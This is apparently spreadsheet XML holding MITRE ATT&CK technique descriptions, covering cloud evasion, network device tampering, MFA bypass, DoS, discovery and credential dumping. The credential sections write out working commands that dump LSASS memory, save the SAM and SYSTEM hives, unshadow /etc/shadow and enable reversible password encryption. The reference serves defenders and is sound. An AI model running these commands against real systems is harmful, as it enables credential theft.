    <t>An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The &lt;code&gt;AllowReversiblePasswordEncryption&lt;/code&gt; property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:
1. Encrypted password (&lt;code&gt;G$RADIUSCHAP&lt;/code&gt;) from the Active Directory user-structure &lt;code&gt;userParameters&lt;/code&gt;
2. 16 byte randomly-generated value (&lt;code&gt;G$RADIUSCHAPKEY&lt;/code&gt;) also from &lt;code&gt;userParameters&lt;/code&gt;
3. Global LSA secret (&lt;code&gt;G$MSRADIUSCHAPKEY&lt;/code&gt;)
4. Static key hardcoded in the Remote Access Subauthentication DLL (&lt;code&gt;RASSFM.DLL&lt;/code&gt;)
With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)
An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to &lt;code&gt;Set-ADUser -AllowReversiblePasswordEncryption $true&lt;/code&gt;.</t>
  </si>
  <si>
    <t>An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.</t>
  </si>
  <si>
    <t>An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.</t>
  </si>
  <si>
    <t>Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)
On embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.
Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.
To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.
To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.
In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.
By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).
Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. 
When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). 
When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. </t>
  </si>
  <si>
    <t>Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. 
If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)
Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)
Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)</t>
  </si>
  <si>
    <t>Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
Adversaries in possession credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.
In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)</t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.
The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Native API functions (such as &lt;code&gt;NtCreateProcess&lt;/code&gt;) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API &lt;code&gt;CreateProcess()&lt;/code&gt; or GNU &lt;code&gt;fork()&lt;/code&gt; will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)
When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities</t>
  </si>
  <si>
    <t>Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.
Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.
For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as &lt;code&gt;dns-sd -B _ssh._tcp .&lt;/code&gt;) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)</t>
  </si>
  <si>
    <t>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\\\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;. For macOS, the &lt;code&gt;sharing -l&lt;/code&gt; command lists all shared points used for smb services.</t>
  </si>
  <si>
    <t>Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. (Citation: Rhino Security Labs AWS VPC Traffic Mirroring)</t>
  </si>
  <si>
    <t>Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. Most modern Linux operating systems use a combination of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to store user account information including password hashes in &lt;code&gt;/etc/shadow&lt;/code&gt;. By default, &lt;code&gt;/etc/shadow&lt;/code&gt; is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;
</t>
  </si>
  <si>
    <t>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</t>
  </si>
  <si>
    <t>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</t>
  </si>
  <si>
    <t>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run using:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
Built-in Windows tools such as comsvcs.dll can also be used:
* &lt;code&gt;rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full&lt;/code&gt;(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in &lt;code&gt;%SystemRoot%\NTDS\Ntds.dit&lt;/code&gt; of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</t>
  </si>
  <si>
    <t>Adversaries may gather credentials from information stored in the Proc filesystem or &lt;code&gt;/proc&lt;/code&gt;. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the &lt;code&gt;net user&lt;/code&gt; command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes: 
